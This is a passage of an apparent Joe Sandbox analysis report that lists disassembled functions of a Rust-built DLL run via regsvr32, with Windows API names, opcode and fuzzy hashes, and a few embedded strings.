                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Process$ErrorLastOpenTimes
                                                                                • String ID:
                                                                                • API String ID: 1188884809-0
                                                                                • Opcode ID: 93a18b092cf4a6bd7b24d03b0818a9b4df5257eb96a611418ace896e3b5f05a2
                                                                                • Instruction ID: c52f129ead32bc04df822eb7e037d14eeeadb0eab4ca0542dff5c08904c70d9c
                                                                                • Opcode Fuzzy Hash: 93a18b092cf4a6bd7b24d03b0818a9b4df5257eb96a611418ace896e3b5f05a2
                                                                                • Instruction Fuzzy Hash: F6615172A18B8243E6A49F25E4403AAB2A1FB95794F10D235EBFD067D5EF7DE0D48700
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: AddressErrorLastWait
                                                                                • String ID:
                                                                                • API String ID: 1574541344-0
                                                                                • Opcode ID: ed70a05f1d20ec105d49a2fe33840aa86f76e32dbb7ad7eca4a7eaace419717b
                                                                                • Instruction ID: f9f79e533bbaa59ee66d804d60b5a3d850589a6a023f9c9ec8c9d0e79d15f7b3
                                                                                • Opcode Fuzzy Hash: ed70a05f1d20ec105d49a2fe33840aa86f76e32dbb7ad7eca4a7eaace419717b
                                                                                • Instruction Fuzzy Hash: 2721E4B2F191138AFF798E75D8199BC27A5AB50788F15C035DF6A4B684CE3CD442C384
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: QueryVirtual
                                                                                • String ID:
                                                                                • API String ID: 1804819252-0
                                                                                • Opcode ID: 7ad2e8c601173baa7d0b193d6b318f4a18832f4d87898cdbe41944223f82d7ac
                                                                                • Instruction ID: 84c298883499dd195dab1e468a7ad760e216356ec532bef7f9b31c90c281fa24
                                                                                • Opcode Fuzzy Hash: 7ad2e8c601173baa7d0b193d6b318f4a18832f4d87898cdbe41944223f82d7ac
                                                                                • Instruction Fuzzy Hash: 8161C2A2B08A4791EAB08F21E4443B9A761FB45BD4F84C532EF6D47B95EF3DE1858310
                                                                                APIs
                                                                                  • Part of subcall function 00007FFB9900A4F0: memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FFB9900A572
                                                                                  • Part of subcall function 00007FFB9900A4F0: GetProcessTimes.KERNEL32 ref: 00007FFB9900A694
                                                                                • memcpy.API-MS-WIN-CRT-PRIVATE-L1-1-0 ref: 00007FFB9901B7F3
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy$ProcessTimes
                                                                                • String ID:
                                                                                • API String ID: 3369102921-0
                                                                                • Opcode ID: 6243e473f3b6b8d19f553fb0d1d1c9c818a7fc21bc4286bd1717a95abe95b021
                                                                                • Instruction ID: e7bfb5e798fa0c5b1e19cca6b3198eb4455802860538ca2f6ba39c125ead0254
                                                                                • Opcode Fuzzy Hash: 6243e473f3b6b8d19f553fb0d1d1c9c818a7fc21bc4286bd1717a95abe95b021
                                                                                • Instruction Fuzzy Hash: 5A815D72619BC685E6B18F20F8447AAB3A4FB95780F548235EADC13B58DF3CD194CB40
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID:
                                                                                • API String ID: 3510742995-0
                                                                                • Opcode ID: 2580fd8042fc4c9308c4a50a559c4f0db754e574a64f772dd70ffccb8e543580
                                                                                • Instruction ID: c23a6b298779cee51091c0eb893d743662cee654c2925b1f7d7816cb9592e71a
                                                                                • Opcode Fuzzy Hash: 2580fd8042fc4c9308c4a50a559c4f0db754e574a64f772dd70ffccb8e543580
                                                                                • Instruction Fuzzy Hash: 5851E762B09B8681FAB68F29E5007B9A364FB85BC4F449534EEAC17B85DF3DE1418300
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcmp
                                                                                • String ID:
                                                                                • API String ID: 1475443563-0
                                                                                • Opcode ID: ce430502d745eef7b07d547f8d41427f4233ec20b23cd2e9d2959184cb231ff5
                                                                                • Instruction ID: a19e4ea33dd4c6c7f55e2e6556e065bafa2748955a7d7cfd556e67fab08c11b8
                                                                                • Opcode Fuzzy Hash: ce430502d745eef7b07d547f8d41427f4233ec20b23cd2e9d2959184cb231ff5
                                                                                • Instruction Fuzzy Hash: A541D7B6A1878281F6619B2AE40036AA361FF957C0F549632FFDD63A55DF3CD1858340
                                                                                APIs
                                                                                • memset.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,00007FFB990085BD), ref: 00007FFB990112F2
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memset
                                                                                • String ID:
                                                                                • API String ID: 2221118986-0
                                                                                • Opcode ID: 44ffa615676fa388739d42c65e1246181da5665d8e2d8a22bd76da9b7933d62e
                                                                                • Instruction ID: b99a6a05fb280abf1227579577030ff227b817eae1c97718eef2ffde7f88e61c
                                                                                • Opcode Fuzzy Hash: 44ffa615676fa388739d42c65e1246181da5665d8e2d8a22bd76da9b7933d62e
                                                                                • Instruction Fuzzy Hash: A831E691B0965B42EEF8CB3699002B65295AB49BF4F54C731CE7D8B7D0ED3CE1958240
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: Value$Information$LogicalProcessor$AllocCallCloseCompleteInitOncePowerPrngProcessQueryVersionmemset
                                                                                • String ID:
                                                                                • API String ID: 1612812885-0
                                                                                • Opcode ID: 65ec80cb2d6eeeaf81028685fcfa17a5c0f368f2d6784e17b982227086a6f180
                                                                                • Instruction ID: 6ac2eb78449c190246e38ece885869f7ea7e2d0168c43d0e0ef636d6d84ad7c9
                                                                                • Opcode Fuzzy Hash: 65ec80cb2d6eeeaf81028685fcfa17a5c0f368f2d6784e17b982227086a6f180
                                                                                • Instruction Fuzzy Hash: 883227B2B0965242FAB49F35D4003BD6691AF88B80FA89535EF9D4B7C5DF3DE8428704
                                                                                APIs
                                                                                Strings
                                                                                • Rng::fill failedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rand-0.8.5\src\rng.rs, xrefs: 00007FFB98FF9089
                                                                                • called `Result::unwrap()` on an `Err` value, xrefs: 00007FFB98FF904D
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: HandleModule$AddressContextInformationProcQueryThread$CloseExceptionHandlerLibraryLoadProcessSystemVectoredmemset
                                                                                • String ID: Rng::fill failedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rand-0.8.5\src\rng.rs$called `Result::unwrap()` on an `Err` value
                                                                                • API String ID: 3151366523-3362511459
                                                                                • Opcode ID: 83c356531b9f9762a9043adf1d6a463cd1e09e3952796af0121d3f7748b25722
                                                                                • Instruction ID: 7c391b74e140683c7e5666eaf5bae475390bafdc04c8b64bac5be019fbb307fd
                                                                                • Opcode Fuzzy Hash: 83c356531b9f9762a9043adf1d6a463cd1e09e3952796af0121d3f7748b25722
                                                                                • Instruction Fuzzy Hash: 6D329FB1A18B9281EBB18B21E5003BABBA0FF45B84FA45535EE8D07B95DF7DE441C704
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorLast$Console$ByteCharHandleMultiWideWritememcpy$CloseModeRead
                                                                                • String ID:
                                                                                • API String ID: 262030326-0
                                                                                • Opcode ID: 03a37ca1b8088afd316fe39b557cd38fad8174c223675c13a03c08b05f556c46
                                                                                • Instruction ID: 81f284edad1cddcb397df317e393fb4b001bbd619659ab402083bf0a99489ce2
                                                                                • Opcode Fuzzy Hash: 03a37ca1b8088afd316fe39b557cd38fad8174c223675c13a03c08b05f556c46
                                                                                • Instruction Fuzzy Hash: 6502FFA2F1929391FBB49F71D8083F966A0AF44B94F458131EE6D87BC9DE3CE5818350
                                                                                APIs
                                                                                Strings
                                                                                • Rng::fill failedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rand-0.8.5\src\rng.rs, xrefs: 00007FFB98FF8678
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$LibraryLoad$CreateEventHandleModuleObjectSingleWait
                                                                                • String ID: Rng::fill failedC:\Users\win10-x64\.cargo\registry\src\index.crates.io-6f17d22bba15001f\rand-0.8.5\src\rng.rs
                                                                                • API String ID: 2726895772-2541100763
                                                                                • Opcode ID: c767602cb81d9ac396bdce0a43a747f462f62fec4e090cbb81ff9fa0cd949ba5
                                                                                • Instruction ID: 9deef5cd6f7dbc8b19421736ed8a3b316650ba3433b9bf04d4cb047465e834a4
                                                                                • Opcode Fuzzy Hash: c767602cb81d9ac396bdce0a43a747f462f62fec4e090cbb81ff9fa0cd949ba5
                                                                                • Instruction Fuzzy Hash: 2BF1DFB2B1865380EE709B32E5007AA6760BF85BD4FA49A31EE6D077D6DF7DE1018704
                                                                                APIs
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: User$EnumInfo
                                                                                • String ID:
                                                                                • API String ID: 2388768862-0
                                                                                • Opcode ID: d1f6a168d115fb8464c204134c553cd7ad8b6b47ac37865dc6fba0b669ffcb99
                                                                                • Instruction ID: 47093f9a395fc26b166ad42a41b5f49d574e309148f9cb8ac3cbd582a5af83ad
                                                                                • Opcode Fuzzy Hash: d1f6a168d115fb8464c204134c553cd7ad8b6b47ac37865dc6fba0b669ffcb99
                                                                                • Instruction Fuzzy Hash: 8C1250B2609B8282EBB09F25E4403AAA7A1FB84BC4F548536DF9D47B99DF3DD445C700
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateFilememcpymemset
                                                                                • String ID:
                                                                                • API String ID: 83581381-3916222277
                                                                                • Opcode ID: 101c16379f8f8cbf383b45ac346becee7e761436e2fc05531052f326e399cc94
                                                                                • Instruction ID: 2dfc5c989c44a4c2ee6eca73949d595ce088791be8f06326cc9a45230b1dc9a5
                                                                                • Opcode Fuzzy Hash: 101c16379f8f8cbf383b45ac346becee7e761436e2fc05531052f326e399cc94
                                                                                • Instruction Fuzzy Hash: 55325DA2A1C7C284F7B19F25E0247EEA2B0FB86744F108135CAAD06AD5DF7DD594CB41
                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: memcpy
                                                                                • String ID: -pty$cygw$msys$win-
                                                                                • API String ID: 3510742995-1440016460
                                                                                • Opcode ID: d3fbad761834d3c8db14849e4a9246d48ef2da392b0ed67f28a5bdf4ce5dc014
                                                                                • Instruction ID: 656ab396766cc9afd305befcecc91d88300419ddcfe9f49c69b31a3c925dd23b
                                                                                • Opcode Fuzzy Hash: d3fbad761834d3c8db14849e4a9246d48ef2da392b0ed67f28a5bdf4ce5dc014
                                                                                • Instruction Fuzzy Hash: E3D1CFA2A0879289FBB08F79D8553FD2790EB54788F548135DA694BBCADF3CD685C300
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: ka
                                                                                • API String ID: 0-1793574901
                                                                                • Opcode ID: 3d6dc4548c1d718a03338362e7f49c509304b02c8e19b8f09930801f70830535
                                                                                • Instruction ID: 9ca37876c67147d986acd4bc4e9ba7804eab7b877968c664fc2ae95bb6839bab
                                                                                • Opcode Fuzzy Hash: 3d6dc4548c1d718a03338362e7f49c509304b02c8e19b8f09930801f70830535
                                                                                • Instruction Fuzzy Hash: F9A1C3A2B0A65781EAB89F3AD6083B92261BF48FD4F558531DD2D077C4DE3CE582C340
                                                                                APIs
                                                                                • WakeByAddressSingle.API-MS-WIN-CORE-SYNCH-L1-2-0 ref: 00007FFB99084AFB
                                                                                  • Part of subcall function 00007FFB990EFDE0: RtlCaptureContext.KERNEL32 ref: 00007FFB990EFE72
                                                                                  • Part of subcall function 00007FFB990EFDE0: RtlUnwindEx.KERNEL32 ref: 00007FFB990EFEAF
                                                                                  • Part of subcall function 00007FFB990EFDE0: abort.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 00007FFB990EFEB5
                                                                                  • Part of subcall function 00007FFB990EFDE0: RaiseException.KERNEL32 ref: 00007FFB990EFEF2
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 0000000E.00000002.102062619138.00007FFB98FF1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FFB98FF0000, based on PE: true
                                                                                • Associated: 0000000E.00000002.102062549180.00007FFB98FF0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062935640.00007FFB990F2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102062979701.00007FFB990F3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063159095.00007FFB991A3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063200271.00007FFB991A4000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063242752.00007FFB991A6000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                • Associated: 0000000E.00000002.102063289349.00007FFB991A9000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_14_2_7ffb98ff0000_regsvr32.jbxd
                                                                                Similarity
                                                                                • API ID: AddressCaptureContextExceptionRaiseSingleUnwindWakeabort
